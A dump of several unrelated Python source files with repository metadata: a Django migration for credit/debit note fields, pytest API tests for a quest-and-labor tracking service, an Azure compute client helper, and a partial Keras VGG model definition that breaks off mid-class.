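    import toleranceinterval as ti
    x = np.random.default_rng(0).normal(loc=10.0, scale=2.0, size=30)
    print(ti.oneside.normal(x, 0.1, 0.95))  # bound covering the 10th percentile, 95% confidence
    print(ti.oneside.normal(x, 0.9, 0.95))  # bound covering the 90th percentile, 95% confidence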
avg_line_length: 39.666667 | max_line_length: 53 | alphanum_fraction: 0.789916
hexsha: 40224aa80e75acd91dec9e073cf2e8e458208bb4 | size: 4544 | ext: py | lang: Python
max_stars_repo_path: web/transiq/team/migrations/0111_auto_20180626_1222.py
max_stars_repo_name: manibhushan05/transiq
max_stars_repo_head_hexsha: 763fafb271ce07d13ac8ce575f2fee653cf39343
max_stars_repo_licenses: ["Apache-2.0"] | max_stars_count: null
max_issues_repo_path: web/transiq/team/migrations/0111_auto_20180626_1222.py
max_issues_repo_name: manibhushan05/transiq
max_issues_repo_head_hexsha: 763fafb271ce07d13ac8ce575f2fee653cf39343
max_issues_repo_licenses: ["Apache-2.0"] | max_issues_count: 14
max_issues_repo_issues_event: 2020-06-05T23:06:45.000Z .. 2022-03-12T00:00:18.000Z
max_forks_repo_path: web/transiq/team/migrations/0111_auto_20180626_1222.py
max_forks_repo_name: manibhushan05/transiq
max_forks_repo_head_hexsha: 763fafb271ce07d13ac8ce575f2fee653cf39343
max_forks_repo_licenses: ["Apache-2.0"] | max_forks_count: null
content:
# Generated by Django 2.0.5 on 2018-06-26 12:22
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('team', '0110_auto_20180622_1506'),
]
operations = [
migrations.AlterField(
model_name='creditnotecustomer',
name='rejected_by',
field=models.ForeignKey(blank=True, limit_choices_to={'is_staff': True}, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='credit_note_customer_rejected_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='creditnotecustomerdirectadvance',
name='rejected_by',
field=models.ForeignKey(blank=True, limit_choices_to={'is_staff': True}, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='credit_note_customer_advance_rejected_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='creditnotecustomerdirectadvance',
name='status',
field=models.CharField(choices=[('pending', 'Pending for Approval'), ('approved', 'Approved'), ('rejected', 'Rejected'), ('partial', 'Partially Adjusted'), ('adjusted', 'Fully Adjusted')], default='pending', max_length=20),
),
migrations.AlterField(
model_name='creditnotesupplier',
name='rejected_by',
field=models.ForeignKey(blank=True, limit_choices_to={'is_staff': True}, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='credit_note_supplier_rejected_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='debitnotecustomer',
name='rejected_by',
field=models.ForeignKey(blank=True, limit_choices_to={'is_staff': True}, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='debit_note_customer_rejected_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='debitnotesupplier',
name='rejected_by',
field=models.ForeignKey(blank=True, limit_choices_to={'is_staff': True}, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='debit_note_supplier_rejected_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='debitnotesupplier',
name='status',
field=models.CharField(choices=[('pending', 'Pending for Approval'), ('approved', 'Approved'), ('rejected', 'Rejected'), ('partial', 'Partially Adjusted'), ('adjusted', 'Fully Adjusted')], default='pending', max_length=20),
),
migrations.AlterField(
model_name='debitnotesupplierdirectadvance',
name='rejected_by',
field=models.ForeignKey(blank=True, limit_choices_to={'is_staff': True}, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='debit_note_supplier_advance_rejected_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='debitnotesupplierdirectadvance',
name='status',
field=models.CharField(choices=[('pending', 'Pending for Approval'), ('approved', 'Approved'), ('rejected', 'Rejected'), ('partial', 'Partially Adjusted'), ('adjusted', 'Fully Adjusted')], default='pending', max_length=20),
),
migrations.AlterField(
model_name='historicalcreditnotecustomerdirectadvance',
name='status',
field=models.CharField(choices=[('pending', 'Pending for Approval'), ('approved', 'Approved'), ('rejected', 'Rejected'), ('partial', 'Partially Adjusted'), ('adjusted', 'Fully Adjusted')], default='pending', max_length=20),
),
migrations.AlterField(
model_name='historicaldebitnotesupplier',
name='status',
field=models.CharField(choices=[('pending', 'Pending for Approval'), ('approved', 'Approved'), ('rejected', 'Rejected'), ('partial', 'Partially Adjusted'), ('adjusted', 'Fully Adjusted')], default='pending', max_length=20),
),
migrations.AlterField(
model_name='historicaldebitnotesupplierdirectadvance',
name='status',
field=models.CharField(choices=[('pending', 'Pending for Approval'), ('approved', 'Approved'), ('rejected', 'Rejected'), ('partial', 'Partially Adjusted'), ('adjusted', 'Fully Adjusted')], default='pending', max_length=20),
),
]
| 59.789474
| 235
| 0.663292
| 461
| 4,544
| 6.331887
| 0.167028
| 0.08222
| 0.102775
| 0.119219
| 0.865365
| 0.865365
| 0.84481
| 0.84481
| 0.84481
| 0.84481
| 0
| 0.011704
| 0.191461
| 4,544
| 75
| 236
| 60.586667
| 0.782798
| 0.009903
| 0
| 0.695652
| 1
| 0
| 0.306204
| 0.101846
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.043478
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4024f9f27cbd2308812278c31cfa81102a8d9c7c
| 28,666
|
py
|
Python
|
tests/api_tests/test_quests.py
|
LaudateCorpus1/hermes-11
|
36e5c0532571eed42d5f6edea35f755b837a5b2d
|
[
"Apache-2.0"
] | 60
|
2015-05-25T06:02:41.000Z
|
2021-09-24T22:11:21.000Z
|
tests/api_tests/test_quests.py
|
dropbox/hermes
|
36e5c0532571eed42d5f6edea35f755b837a5b2d
|
[
"Apache-2.0"
] | 42
|
2015-06-16T06:31:01.000Z
|
2017-09-01T18:28:30.000Z
|
tests/api_tests/test_quests.py
|
LaudateCorpus1/hermes-11
|
36e5c0532571eed42d5f6edea35f755b837a5b2d
|
[
"Apache-2.0"
] | 16
|
2015-05-24T02:34:06.000Z
|
2021-08-21T08:13:12.000Z
|
import json
import pytest
import requests
import logging
from .fixtures import tornado_server, tornado_app, sample_data1_server
from datetime import datetime, timedelta
from .util import (
assert_error, assert_success, assert_created, assert_deleted, Client
)
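# End-to-end API tests covering quest creation, updates, filtering, and the labor lifecycle.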
def test_malformed(sample_data1_server):
client = sample_data1_server
assert_error(client.post("/quests", data="Non-JSON"), 400)
def test_creation(sample_data1_server):
client = sample_data1_server
# We start with 2 events in the test data
assert_success(
client.get("/events"),
{
"events": [{"eventTypeId": 1,
"hostId": 1,
"id": 1,
"note": "example needs a reboot",
"user": "system@example.com"},
{"eventTypeId": 2,
"hostId": 1,
"id": 2,
"note": "example needs a rebooted",
"user": "system@example.com"}],
"limit": 10,
"offset": 0,
"totalEvents": 2
},
strip=["timestamp"]
)
# We start with 0 quests in the test data
assert_success(
client.get("/quests"),
{
"limit": 10,
"offset": 0,
"totalQuests": 0,
"quests": []
}
)
# We create a quest with a target time 7 days from today
target_time = datetime.utcnow() + timedelta(days=7)
assert_created(
client.create(
"/quests",
creator="johnny@example.com",
fateId=1,
targetTime=str(target_time),
description="This is a quest almighty",
hostnames=["example", "sample", "test"]
),
"/api/v1/quests/1"
)
assert_success(
client.get("/quests"),
{
"limit": 10,
"offset": 0,
"totalQuests": 1
},
strip=["quests"]
)
assert_success(
client.get("/quests/1"),
{
"id": 1,
"creator": "johnny@example.com",
"targetTime": str(target_time),
"description": "This is a quest almighty",
"completionTime": None
},
strip=["embarkTime", "labors"]
)
assert_success(
client.get("/events"),
{
"limit": 10,
"offset": 0,
"totalEvents": 5
},
strip=["events"]
)
def test_update(sample_data1_server):
client = sample_data1_server
target_time = datetime.utcnow() + timedelta(days=7)
target_time2 = datetime.utcnow() + timedelta(days=12)
# Create a quest
assert_created(
client.create(
"/quests",
creator="johnny@example.com",
fateId=1,
targetTime=str(target_time),
description="This is a quest almighty",
hostnames=["example", "sample", "test"]
),
"/api/v1/quests/1"
)
# Update the creator of the quest
assert_success(
client.update(
"/quests/1",
creator="betsy@example.com"
),
{
"id": 1,
"creator": "betsy@example.com",
"targetTime": str(target_time),
"description": "This is a quest almighty",
"completionTime": None
},
strip=["embarkTime", "labors"]
)
# Verify the creator has changed
assert_success(
client.get("/quests/1"),
{
"id": 1,
"creator": "betsy@example.com",
"targetTime": str(target_time),
"description": "This is a quest almighty",
"completionTime": None
},
strip=["embarkTime", "labors"]
)
# Update the description
assert_success(
client.update(
"/quests/1",
description="New desc"
),
{
"id": 1,
"creator": "betsy@example.com",
"targetTime": str(target_time),
"description": "New desc",
"completionTime": None
},
strip=["embarkTime", "labors"]
)
# Verify the new description
assert_success(
client.get("/quests/1"),
{
"id": 1,
"creator": "betsy@example.com",
"targetTime": str(target_time),
"description": "New desc",
"completionTime": None
},
strip=["embarkTime", "labors"]
)
# Update both creator and description
assert_success(
client.update(
"/quests/1",
description="Newer desc",
creator="tommy@example.com"
),
{
"id": 1,
"creator": "tommy@example.com",
"targetTime": str(target_time),
"description": "Newer desc",
"completionTime": None
},
strip=["embarkTime", "labors"]
)
# Verify both creator and description have updated
assert_success(
client.get("/quests/1"),
{
"id": 1,
"creator": "tommy@example.com",
"targetTime": str(target_time),
"description": "Newer desc",
"completionTime": None
},
strip=["embarkTime", "labors"]
)
# Update the target time
assert_success(
client.update(
"/quests/1",
targetTime=str(target_time2)
),
{
"id": 1,
"creator": "tommy@example.com",
"targetTime": str(target_time2),
"description": "Newer desc",
"completionTime": None
},
strip=["embarkTime", "labors"]
)
# Verify target time updated
assert_success(
client.get("/quests/1"),
{
"id": 1,
"creator": "tommy@example.com",
"targetTime": str(target_time2),
"description": "Newer desc",
"completionTime": None
},
strip=["embarkTime", "labors"]
)
def test_quest_lifecycle(sample_data1_server, caplog):
caplog.setLevel(logging.INFO)
client = sample_data1_server
# We start with 2 events in the test data
assert_success(
client.get("/events"),
{
"events": [{"eventTypeId": 1,
"hostId": 1,
"id": 1,
"note": "example needs a reboot",
"user": "system@example.com"},
{"eventTypeId": 2,
"hostId": 1,
"id": 2,
"note": "example needs a rebooted",
"user": "system@example.com"}],
"limit": 10,
"offset": 0,
"totalEvents": 2
},
strip=["timestamp"]
)
# We start with 0 quests in the test data
assert_success(
client.get("/quests"),
{
"limit": 10,
"offset": 0,
"totalQuests": 0,
"quests": []
}
)
target_time = datetime.utcnow() + timedelta(days=7)
# Create a quest with system-maintenance required
assert_created(
client.create(
"/quests",
creator="johnny",
fateId=3,
targetTime=str(target_time),
description="This is a quest almighty",
hostnames=["example", "sample", "test"]
),
"/api/v1/quests/1"
)
# make sure we now have 5 events (we started with 2 and
# we just created 3)
assert_success(
client.get("/events"),
{
"limit": 10,
"offset": 0,
"totalEvents": 5
},
strip=["events"]
)
# Make sure we created the appropriate labors for this quest
assert_success(
client.get("/labors"),
{
"limit": 10,
"offset": 0,
"totalLabors": 3,
"labors": [{"ackTime": None,
"ackUser": None,
"completionEventId": None,
"creationEventId": 3,
"targetTime": str(target_time),
"hostId": 1,
"fateId": 3,
"closingFateId": None,
"forOwner": True,
"forCreator": False,
"id": 1,
"startingLaborId": None,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": None,
"creationEventId": 4,
"targetTime": str(target_time),
"hostId": 2,
"fateId": 3,
"closingFateId": None,
"forOwner": True,
"forCreator": False,
"id": 2,
"startingLaborId": None,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": None,
"creationEventId": 5,
"targetTime": str(target_time),
"hostId": 3,
"fateId": 3,
"closingFateId": None,
"forOwner": True,
"forCreator": False,
"id": 3,
"startingLaborId": None,
"questId": 1}],
},
strip=["creationTime", "completionTime"]
)
# Ensure that the quest doesn't have a completion time yet
# Also, test the progress info meta feature
assert_success(
client.get("/quests/1?progressInfo=true"),
{
"creator": "johnny@example.com",
"description": "This is a quest almighty",
"id": 1,
"totalLabors": 3,
"unstartedLabors": 3,
"inprogressLabors": 0,
"completedLabors": 0,
"percentComplete": 0.0,
},
strip=["embarkTime", "creationTime", "completionTime", "targetTime"]
)
# Throw events that should trigger intermediate labors
client.create(
"/events",
questId=1,
user="testman@example.com",
eventTypeId=4,
note="There are intermediate triggering events"
)
# make sure we now have 8 events (we started with 2 and
# we created 3 at the start and 3 more just now)
assert_success(
client.get("/events"),
{
"limit": 10,
"offset": 0,
"totalEvents": 8
},
strip=["events"]
)
# Make sure we created the appropriate labors for this quest
assert_success(
client.get("/labors"),
{
"limit": 10,
"offset": 0,
"totalLabors": 6,
"labors": [{"ackTime": None,
"ackUser": None,
"completionEventId": 6,
"creationEventId": 3,
"targetTime": str(target_time),
"hostId": 1,
"fateId": 3,
"closingFateId": 4,
"forOwner": True,
"forCreator": False,
"id": 1,
"startingLaborId": None,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": 7,
"creationEventId": 4,
"targetTime": str(target_time),
"hostId": 2,
"fateId": 3,
"closingFateId": 4,
"forOwner": True,
"forCreator": False,
"id": 2,
"startingLaborId": None,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": 8,
"creationEventId": 5,
"targetTime": str(target_time),
"hostId": 3,
"fateId": 3,
"closingFateId": 4,
"forOwner": True,
"forCreator": False,
"id": 3,
"startingLaborId": None,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": None,
"creationEventId": 6,
"targetTime": str(target_time),
"hostId": 1,
"fateId": 4,
"closingFateId": None,
"id": 4,
"forOwner": False,
"forCreator": True,
"startingLaborId": 1,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": None,
"creationEventId": 7,
"targetTime": str(target_time),
"hostId": 2,
"fateId": 4,
"closingFateId": None,
"forOwner": False,
"forCreator": True,
"id": 5,
"startingLaborId": 2,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": None,
"creationEventId": 8,
"targetTime": str(target_time),
"hostId": 3,
"forOwner": False,
"forCreator": True,
"fateId": 4,
"closingFateId": None,
"id": 6,
"startingLaborId": 3,
"questId": 1}]
},
strip=["creationTime", "completionTime"]
)
# Ensure that the quest doesn't have a completion time yet
# Also, test two meta features: progress info and
# filtering to show only open labors
assert_success(
client.get("/quests/1?progressInfo=true&onlyOpenLabors=true&expand=labors&expand=eventtypes&expand=fates"),
{
"creator": "johnny@example.com",
"description": "This is a quest almighty",
"id": 1,
"totalLabors": 3,
"unstartedLabors": 0,
"inprogressLabors": 3,
"completedLabors": 0,
"percentComplete": 50.0,
"labors": [
{
"ackTime": None,
"ackUser": None,
"completionEventId": None,
"creationEventId": 6,
"hostId": 1,
"forOwner": False,
"forCreator": True,
"id": 4,
"fateId": 4,
"closingFateId": None,
"fate": {
"creationEventType": {
"category": "system-maintenance",
"state": "ready",
"id": 4,
"description": "This system is ready for maintenance.",
"restricted": False,
},
"creationEventTypeId": 4,
"description": "A system that needs maintenance made ready before maintenance can occur.",
"followsId": 3,
"forOwner": False,
"forCreator": True,
"id": 4,
"precedesIds": [5],
},
"closingFate": None,
"startingLaborId": 1,
"questId": 1
},
{
"ackTime": None,
"ackUser": None,
"completionEventId": None,
"creationEventId": 7,
"hostId": 2,
"forOwner": False,
"forCreator": True,
"id": 5,
"fateId": 4,
"closingFateId": None,
"fate": {
"creationEventType": {
"category": "system-maintenance",
"state": "ready",
"id": 4,
"description": "This system is ready for maintenance.",
"restricted": False,
},
"creationEventTypeId": 4,
"description": "A system that needs maintenance made ready before maintenance can occur.",
"followsId": 3,
"forOwner": False,
"forCreator": True,
"id": 4,
"precedesIds": [5],
},
"closingFate": None,
"startingLaborId": 2,
"questId": 1
},
{
"ackTime": None,
"ackUser": None,
"completionEventId": None,
"creationEventId": 8,
"hostId": 3,
"forOwner": False,
"forCreator": True,
"id": 6,
"fateId": 4,
"closingFateId": None,
"fate": {
"creationEventType": {
"category": "system-maintenance",
"state": "ready",
"id": 4,
"description": "This system is ready for maintenance.",
"restricted": False,
},
"creationEventTypeId": 4,
"description": "A system that needs maintenance made ready before maintenance can occur.",
"followsId": 3,
"forOwner": False,
"forCreator": True,
"id": 4,
"precedesIds": [5],
},
"closingFate": None,
"startingLaborId": 3,
"questId": 1
}
]
},
strip=["embarkTime", "creationTime", "completionTime", "targetTime"]
)
# Throw events that should trigger closing of the intermediate labors
client.create(
"/events",
questId=1,
user="testman@example.com",
eventTypeId=5,
note="There are intermediate triggering events"
)
# make sure we now have 11 events
assert_success(
client.get("/events"),
{
"limit": 10,
"offset": 0,
"totalEvents": 11
},
strip=["events"]
)
# Make sure we created the appropriate labors for this quest
assert_success(
client.get("/labors"),
{
"limit": 10,
"offset": 0,
"totalLabors": 6,
"labors": [{"ackTime": None,
"ackUser": None,
"completionEventId": 6,
"creationEventId": 3,
"targetTime": str(target_time),
"hostId": 1,
"forOwner": True,
"forCreator": False,
"id": 1,
"fateId": 3,
"closingFateId": 4,
"startingLaborId": None,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": 7,
"creationEventId": 4,
"targetTime": str(target_time),
"hostId": 2,
"forOwner": True,
"forCreator": False,
"id": 2,
"fateId": 3,
"closingFateId": 4,
"startingLaborId": None,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": 8,
"creationEventId": 5,
"targetTime": str(target_time),
"hostId": 3,
"forOwner": True,
"forCreator": False,
"id": 3,
"fateId": 3,
"closingFateId": 4,
"startingLaborId": None,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": 9,
"creationEventId": 6,
"targetTime": str(target_time),
"hostId": 1,
"forOwner": False,
"forCreator": True,
"id": 4,
"fateId": 4,
"closingFateId": 5,
"startingLaborId": 1,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": 10,
"creationEventId": 7,
"targetTime": str(target_time),
"hostId": 2,
"forOwner": False,
"forCreator": True,
"fateId": 4,
"closingFateId": 5,
"id": 5,
"startingLaborId": 2,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": 11,
"creationEventId": 8,
"targetTime": str(target_time),
"hostId": 3,
"forOwner": False,
"forCreator": True,
"fateId": 4,
"closingFateId": 5,
"id": 6,
"startingLaborId": 3,
"questId": 1}]
},
strip=["creationTime", "completionTime"]
)
# Ensure that the quest now has a completion time
quest_info = client.get("/quests/1").json()
assert quest_info["completionTime"] is not None
assert_success(
client.get("/labors/?startingLaborId=3"),
{
"limit": 10,
"offset": 0,
"totalLabors": 2,
"labors": [{"ackTime": None,
"ackUser": None,
"completionEventId": 8,
"creationEventId": 5,
"targetTime": str(target_time),
"hostId": 3,
"forOwner": True,
"forCreator": False,
"id": 3,
"fateId": 3,
"closingFateId": 4,
"startingLaborId": None,
"questId": 1},
{"ackTime": None,
"ackUser": None,
"completionEventId": 11,
"creationEventId": 8,
"targetTime": str(target_time),
"hostId": 3,
"forOwner": False,
"forCreator": True,
"id": 6,
"fateId": 4,
"closingFateId": 5,
"startingLaborId": 3,
"questId": 1}]
},
strip=["creationTime", "completionTime"]
)
assert_success(
client.get("/quests/1?progressInfo=true&onlyOpenLabors=true&expand=labors"),
{
"creator": "johnny@example.com",
"description": "This is a quest almighty",
"id": 1,
"totalLabors": 3,
"unstartedLabors": 0,
"inprogressLabors": 0,
"completedLabors": 3,
"percentComplete": 100.0,
"labors": [
]
},
strip=["embarkTime", "creationTime", "completionTime", "targetTime"]
)
def test_filter_by_creator(sample_data1_server):
client = sample_data1_server
# We start with 0 quests in the test data
assert_success(
client.get("/quests"),
{
"limit": 10,
"offset": 0,
"totalQuests": 0,
"quests": []
}
)
# Have johnny create a quest
assert_created(
client.create(
"/quests",
creator="johnny@example.com",
fateId=1,
description="This is a quest almighty",
hostnames=["example", "sample", "test"]
),
"/api/v1/quests/1"
)
# Have bonny create a quest
assert_created(
client.create(
"/quests",
creator="bonny@example.com",
fateId=1,
description="This is a quest not so almighty",
hostnames=["example", "sample", "test"]
),
"/api/v1/quests/2"
)
assert_success(
client.get("/quests"),
{
"limit": 10,
"offset": 0,
"totalQuests": 2
},
strip=["quests"]
)
quest_1 = client.get("/quests?byCreator=johnny@example.com").json()
quest_2 = client.get("/quests?byCreator=bonny@example.com").json()
assert len(quest_1['quests']) == 1
assert quest_1['quests'][0]['id'] == 1
assert len(quest_2['quests']) == 1
assert quest_2['quests'][0]['id'] == 2
assert_success(
client.get("/quests?byCreator=noone@example.com"),
{
"limit": 10,
"offset": 0,
"totalQuests": 0
},
strip=["quests"]
)
def test_filter_by_hostnames(sample_data1_server):
client = sample_data1_server
# We start with 0 quests in the test data
assert_success(
client.get("/quests"),
{
"limit": 10,
"offset": 0,
"totalQuests": 0,
"quests": []
}
)
# Have johnny create a quest
assert_created(
client.create(
"/quests",
creator="johnny@example.com",
fateId=1,
description="This is a quest almighty",
hostnames=["sample"]
),
"/api/v1/quests/1"
)
# Have bonny create a quest
assert_created(
client.create(
"/quests",
creator="bonny@example.com",
fateId=1,
description="This is a quest not so almighty",
hostnames=["example", "sample", "test"]
),
"/api/v1/quests/2"
)
assert_success(
client.get("/quests"),
{
"limit": 10,
"offset": 0,
"totalQuests": 2
},
strip=["quests"]
)
quest_1 = client.get("/quests?hostnames=example,test").json()
quest_2 = client.get("/quests?hostnames=sample").json()
assert len(quest_1['quests']) == 1
assert quest_1['quests'][0]['id'] == 2
assert len(quest_2['quests']) == 2
assert quest_2['quests'][0]['id'] == 1
assert quest_2['quests'][1]['id'] == 2
assert_success(
client.get("/quests?hostnames=not-a-server"),
{
"limit": 10,
"offset": 0,
"totalQuests": 0
},
strip=["quests"]
)
| 31.957637
| 115
| 0.407556
| 2,129
| 28,666
| 5.426022
| 0.090183
| 0.028566
| 0.050987
| 0.05142
| 0.894564
| 0.872663
| 0.848598
| 0.807479
| 0.769217
| 0.753809
| 0
| 0.025253
| 0.476453
| 28,666
| 896
| 116
| 31.993304
| 0.74447
| 0.054141
| 0
| 0.777778
| 0
| 0.001263
| 0.257776
| 0.014629
| 0
| 0
| 0
| 0
| 0.063131
| 1
| 0.007576
| false
| 0
| 0.008838
| 0
| 0.016414
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4062a3546935b03c5dd2cf755f06a125d0eb0b0f
| 271
|
py
|
Python
|
src/api-service/__app__/onefuzzlib/azure/compute.py
|
tonybaloney/onefuzz
|
e0f2e9ed5aae006e0054387de7a0ff8c83c8f722
|
[
"MIT"
] | 2,692
|
2020-09-15T17:54:21.000Z
|
2022-03-31T11:58:57.000Z
|
src/api-service/__app__/onefuzzlib/azure/compute.py
|
tonybaloney/onefuzz
|
e0f2e9ed5aae006e0054387de7a0ff8c83c8f722
|
[
"MIT"
] | 980
|
2020-09-18T18:23:01.000Z
|
2022-03-30T22:20:43.000Z
|
src/api-service/__app__/onefuzzlib/azure/compute.py
|
nharper285/onefuzz
|
1de2cc841d6fc885f8bcb6d032bf5b96ddb52493
|
[
"MIT"
] | 177
|
2020-09-16T00:10:56.000Z
|
2022-03-30T21:18:10.000Z
|
from azure.mgmt.compute import ComputeManagementClient
from memoization import cached
from .creds import get_identity, get_subscription
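# @cached memoizes the result, so repeated calls reuse a single authenticated client.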
@cached
def get_compute_client() -> ComputeManagementClient:
return ComputeManagementClient(get_identity(), get_subscription())
| 27.1
| 70
| 0.833948
| 29
| 271
| 7.586207
| 0.517241
| 0.1
| 0.127273
| 0.236364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103321
| 271
| 9
| 71
| 30.111111
| 0.90535
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| true
| 0
| 0.5
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
409afcd3d0ee84dde3b20a6bb1c924c2bc7a6126
| 7,389
|
py
|
Python
|
PrognosAIs/Model/Architectures/VGG.py
|
Svdvoort/prognosais
|
f5f144a2aac5610ea2450392853aa37bce311085
|
[
"Apache-2.0"
] | 3
|
2020-11-10T09:21:51.000Z
|
2021-01-12T15:14:19.000Z
|
PrognosAIs/Model/Architectures/VGG.py
|
Svdvoort/prognosais
|
f5f144a2aac5610ea2450392853aa37bce311085
|
[
"Apache-2.0"
] | 38
|
2020-11-18T14:19:25.000Z
|
2022-03-17T09:28:48.000Z
|
PrognosAIs/Model/Architectures/VGG.py
|
Svdvoort/prognosais
|
f5f144a2aac5610ea2450392853aa37bce311085
|
[
"Apache-2.0"
] | null | null | null |
from PrognosAIs.Model.Architectures.Architecture import ClassificationNetworkArchitecture
from tensorflow.keras.layers import Conv2D
from tensorflow.keras.layers import Conv3D
from tensorflow.keras.layers import Dense
from tensorflow.keras.layers import Dropout
from tensorflow.keras.layers import Flatten
from tensorflow.keras.layers import MaxPooling2D
from tensorflow.keras.layers import MaxPooling3D
from tensorflow.keras.models import Model
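# Base class with dimension-aware convolution/pooling helpers shared by the VGG variants below.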
class VGG(ClassificationNetworkArchitecture):
def init_dimensionality(self, N_dimension):
if N_dimension == 2:
self.dims = 2
self.conv_func = Conv2D
self.pool_func = MaxPooling2D
elif N_dimension == 3:
self.dims = 3
self.conv_func = Conv3D
self.pool_func = MaxPooling3D
def get_VGG_block(self, layer, N_filters, N_conv_layer):
stride_size = self.get_corrected_stride_size(layer, [2] * self.dims, [2] * self.dims)
pooling = self.pool_func(pool_size=[2] * self.dims, strides=stride_size, padding="valid")(
layer
)
conv = self.conv_func(
filters=N_filters,
kernel_size=[3] * self.dims,
strides=[1] * self.dims,
padding="same",
activation="relu",
)(pooling)
for i_conv_layer in range(N_conv_layer - 1):
conv = self.conv_func(
filters=N_filters,
kernel_size=[3] * self.dims,
strides=[1] * self.dims,
padding="same",
activation="relu",
)(conv)
return conv
class VGG_16_2D(VGG):
dims = 2
def create_model(self):
self.init_dimensionality(self.dims)
self.check_minimum_input_size(self.inputs, [24, 24])
conv_1 = Conv2D(
filters=64, kernel_size=[3, 3], strides=[1, 1], padding="same", activation="relu",
)(self.inputs)
conv_2 = Conv2D(
filters=64, kernel_size=[3, 3], strides=[1, 1], padding="same", activation="relu",
)(conv_1)
vgg_block_1 = self.get_VGG_block(conv_2, 128, 2)
vgg_block_1 = self.make_dropout_layer(vgg_block_1)
vgg_block_2 = self.get_VGG_block(vgg_block_1, 256, 3)
vgg_block_2 = self.make_dropout_layer(vgg_block_2)
vgg_block_3 = self.get_VGG_block(vgg_block_2, 512, 3)
vgg_block_3 = self.make_dropout_layer(vgg_block_3)
vgg_block_4 = self.get_VGG_block(vgg_block_3, 512, 3)
stride_size = self.get_corrected_stride_size(vgg_block_4, [2, 2], [2, 2])
pooling_1 = MaxPooling2D(pool_size=[2, 2], strides=stride_size, padding="valid",)(
vgg_block_4
)
flatten_1 = Flatten()(pooling_1)
flatten_1 = self.make_dropout_layer(flatten_1)
dense_1 = Dense(4096, activation="relu")(flatten_1)
dense_2 = Dense(4096, activation="relu")(dense_1)
predictions = self.outputs(dense_2)
model = Model(inputs=self.inputs, outputs=predictions)
return model
class VGG_16_3D(VGG):
dims = 3
def create_model(self):
self.init_dimensionality(self.dims)
self.check_minimum_input_size(self.inputs, [24, 24, 24])
conv_1 = Conv3D(
filters=64, kernel_size=[3, 3, 3], strides=[1, 1, 1], padding="same", activation="relu",
)(self.inputs)
conv_2 = Conv3D(
filters=64, kernel_size=[3, 3, 3], strides=[1, 1, 1], padding="same", activation="relu",
)(conv_1)
vgg_block_1 = self.get_VGG_block(conv_2, 128, 2)
vgg_block_1 = self.make_dropout_layer(vgg_block_1)
vgg_block_2 = self.get_VGG_block(vgg_block_1, 256, 3)
vgg_block_2 = self.make_dropout_layer(vgg_block_2)
vgg_block_3 = self.get_VGG_block(vgg_block_2, 512, 3)
vgg_block_3 = self.make_dropout_layer(vgg_block_3)
vgg_block_4 = self.get_VGG_block(vgg_block_3, 512, 3)
stride_size = self.get_corrected_stride_size(vgg_block_4, [2, 2, 2], [2, 2, 2])
pooling_1 = MaxPooling3D(pool_size=[2, 2, 2], strides=stride_size, padding="valid",)(
vgg_block_4
)
flatten_1 = Flatten()(pooling_1)
flatten_1 = self.make_dropout_layer(flatten_1)
dense_1 = Dense(4096, activation="relu")(flatten_1)
dense_2 = Dense(4096, activation="relu")(dense_1)
predictions = self.outputs(dense_2)
model = Model(inputs=self.inputs, outputs=predictions)
return model
class VGG_19_2D(VGG):
dims = 2
def create_model(self):
self.init_dimensionality(self.dims)
self.check_minimum_input_size(self.inputs, [24, 24])
conv_1 = Conv2D(
filters=64, kernel_size=[3, 3], strides=[1, 1], padding="same", activation="relu",
)(self.inputs)
conv_2 = Conv2D(
filters=64, kernel_size=[3, 3], strides=[1, 1], padding="same", activation="relu",
)(conv_1)
vgg_block_1 = self.get_VGG_block(conv_2, 128, 2)
vgg_block_1 = self.make_dropout_layer(vgg_block_1)
